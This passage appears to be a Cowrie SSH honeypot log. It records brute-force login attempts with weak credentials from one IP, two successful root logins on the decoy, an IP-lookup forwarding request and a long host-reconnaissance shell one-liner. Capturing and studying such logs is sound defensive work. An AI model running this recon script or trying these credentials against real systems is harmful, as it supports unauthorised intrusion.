.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:06:04.867432Z","src_ip":"212.227.235.229","session":"b6da223d5eec"}
{"eventid":"cowrie.login.failed","username":"test","password":"q1w2e3","message":"login attempt [test/q1w2e3] failed","sensor":"my-vps","timestamp":"2025-08-26T21:06:07.505776Z","src_ip":"212.227.235.229","session":"b6da223d5eec"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:06:08.878789Z","src_ip":"212.227.235.229","session":"b6da223d5eec"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52216,"dst_ip":"1.2.3.4","dst_port":22,"session":"77e3474f9a2f","protocol":"ssh","message":"New connection: 212.227.235.229:52216 (1.2.3.4:22) [session: 77e3474f9a2f]","sensor":"my-vps","timestamp":"2025-08-26T21:06:11.827975Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:06:12.055026Z","src_ip":"212.227.235.229","session":"77e3474f9a2f"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:06:12.095755Z","src_ip":"212.227.235.229","session":"77e3474f9a2f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"P@ssw0rd","message":"login attempt [admin/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T21:06:13.457669Z","src_ip":"212.227.235.229","session":"77e3474f9a2f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35150,"dst_ip":"1.2.3.4","dst_port":22,"session":"94e1bc2143ee","protocol":"ssh","message":"New connection: 212.227.235.229:35150 (1.2.3.4:22) [session: 94e1bc2143ee]","sensor":"my-vps","timestamp":"2025-08-26T21:06:14.260008Z"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:06:14.721584Z","src_ip":"212.227.235.229","session":"77e3474f9a2f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46017,"dst_ip":"1.2.3.4","dst_port":22,"session":"176d0945e573","protocol":"ssh","message":"New connection: 212.227.235.229:46017 (1.2.3.4:22) [session: 176d0945e573]","sensor":"my-vps","timestamp":"2025-08-26T21:06:15.288130Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T21:06:15.526206Z","src_ip":"212.227.235.229","session":"176d0945e573"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T21:06:15.653388Z","src_ip":"212.227.235.229","session":"176d0945e573"}
{"eventid":"cowrie.login.failed","username":"","password":"admin","message":"login attempt [/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T21:06:17.246809Z","src_ip":"212.227.235.229","session":"176d0945e573"}
{"eventid":"cowrie.login.failed","username":"cisco","password":"cisco123","message":"login attempt [cisco/cisco123] failed","sensor":"my-vps","timestamp":"2025-08-26T21:06:18.376802Z","src_ip":"212.227.235.229","session":"176d0945e573"}
{"eventid":"cowrie.login.failed","username":"cisco","password":"abc123","message":"login attempt [cisco/abc123] failed","sensor":"my-vps","timestamp":"2025-08-26T21:06:19.507179Z","src_ip":"212.227.235.229","session":"176d0945e573"}
{"eventid":"cowrie.login.failed","username":"cisco","password":"abcd123","message":"login attempt [cisco/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-26T21:06:20.637030Z","src_ip":"212.227.235.229","session":"176d0945e573"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58578,"dst_ip":"1.2.3.4","dst_port":22,"session":"61028607a5f4","protocol":"ssh","message":"New connection: 212.227.235.229:58578 (1.2.3.4:22) [session: 61028607a5f4]","sensor":"my-vps","timestamp":"2025-08-26T21:06:21.023552Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:06:21.024605Z","src_ip":"212.227.235.229","session":"61028607a5f4"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:06:21.129833Z","src_ip":"212.227.235.229","session":"94e1bc2143ee"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:06:21.130486Z","src_ip":"212.227.235.229","session":"94e1bc2143ee"}
{"eventid":"cowrie.login.failed","username":"cisco","password":"abcd1234","message":"login attempt [cisco/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-26T21:06:21.767529Z","src_ip":"212.227.235.229","session":"176d0945e573"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:06:22.903634Z","src_ip":"212.227.235.229","session":"176d0945e573"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":49516,"dst_ip":"1.2.3.4","dst_port":22,"session":"c8b9e40ebaec","protocol":"ssh","message":"New connection: 217.72.205.35:49516 (1.2.3.4:22) [session: c8b9e40ebaec]","sensor":"my-vps","timestamp":"2025-08-26T21:06:26.647015Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:06:26.648153Z","src_ip":"217.72.205.35","session":"c8b9e40ebaec"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:06:28.047888Z","src_ip":"212.227.235.229","session":"61028607a5f4"}
{"eventid":"cowrie.login.success","username":"root","password":"admin123","message":"login attempt [root/admin123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:06:34.435959Z","src_ip":"212.227.235.229","session":"61028607a5f4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-26T21:06:34.707972Z","session":"61028607a5f4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47636,"dst_ip":"1.2.3.4","dst_port":22,"session":"609190e92895","protocol":"ssh","message":"New connection: 212.227.235.229:47636 (1.2.3.4:22) [session: 609190e92895]","sensor":"my-vps","timestamp":"2025-08-26T21:06:36.855430Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:06:38.224970Z","src_ip":"212.227.235.229","session":"609190e92895"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T21:06:38.225988Z","src_ip":"212.227.235.229","session":"609190e92895"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T21:06:39.809164Z","src_ip":"212.227.235.229","session":"61028607a5f4"}
{"eventid":"cowrie.session.closed","duration":"19.1","message":"Connection lost after 19.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:06:40.094988Z","src_ip":"212.227.235.229","session":"61028607a5f4"}
{"eventid":"cowrie.login.failed","username":"guest1","password":"guest1","message":"login attempt [guest1/guest1] failed","sensor":"my-vps","timestamp":"2025-08-26T21:06:42.382309Z","src_ip":"212.227.235.229","session":"94e1bc2143ee"}
{"eventid":"cowrie.login.success","username":"root","password":"P4ssword","message":"login attempt [root/P4ssword] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:06:43.692771Z","src_ip":"212.227.235.229","session":"609190e92895"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:06:48.288324Z","src_ip":"212.227.235.229","session":"609190e92895"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T21:06:48.289051Z","src_ip":"212.227.235.229","session":"609190e92895"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T21:06:48.289649Z","src_ip":"212.227.235.229","session":"609190e92895"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T21:06:48.290705Z","src_ip":"212.227.235.229","session":"609190e92895"}
